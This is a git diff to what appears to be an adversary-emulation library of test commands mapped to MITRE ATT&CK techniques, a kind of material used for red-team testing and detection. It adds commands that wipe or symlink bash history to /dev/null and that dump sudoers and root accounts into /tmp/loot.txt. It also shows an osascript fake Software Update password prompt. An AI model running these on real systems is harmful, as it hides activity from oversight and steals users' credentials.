diff --git a/Linux/Defense_Evasion/Clear_Command_History.md b/Linux/Defense_Evasion/Clear_Command_History.md index 66c0f696..59540e46 100644 --- a/Linux/Defense_Evasion/Clear_Command_History.md +++ b/Linux/Defense_Evasion/Clear_Command_History.md @@ -15,4 +15,8 @@ MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1146) rm ~/.bash_history + echo "" > ~/.bash_history + cat /dev/null > ~/.bash_history + + ln -sf /dev/null ~/.bash_history diff --git a/Linux/Discovery/Account_Discovery.md b/Linux/Discovery/Account_Discovery.md index 307df472..4531bba5 100644 --- a/Linux/Discovery/Account_Discovery.md +++ b/Linux/Discovery/Account_Discovery.md @@ -6,6 +6,18 @@ List of all accounts: cat /etc/passwd +View sudoers access (requires root): + + cat /etc/sudoers > /tmp/loot.txt + +View accounts with UID 0: + + grep 'x:0:' /etc/passwd > /tmp/loot.txt + +List opened files by user: + + username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username + Currently logged in: Local: @@ -15,3 +27,7 @@ Local: Remote: finger @ + +Show if a user account has ever logged in remotely: + + lastlog > /tmp/loot.txt diff --git a/Linux/README.md b/Linux/README.md index ebb84ad4..cfad99c6 100644 --- a/Linux/README.md +++ b/Linux/README.md @@ -2,7 +2,7 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| -| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port | +| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port | | Bootkit | Setuid and Setgid | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | | [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy | | Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | diff --git a/Mac/Credential_Access/Input_Prompt.md b/Mac/Credential_Access/Input_Prompt.md index b2f7e19b..154252c5 100644 --- a/Mac/Credential_Access/Input_Prompt.md +++ b/Mac/Credential_Access/Input_Prompt.md @@ -7,4 +7,6 @@ MITRE ATT&CK Technique: [T1141](https://attack.mitre.org/wiki/Technique/T1141) osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' +Reference: + http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html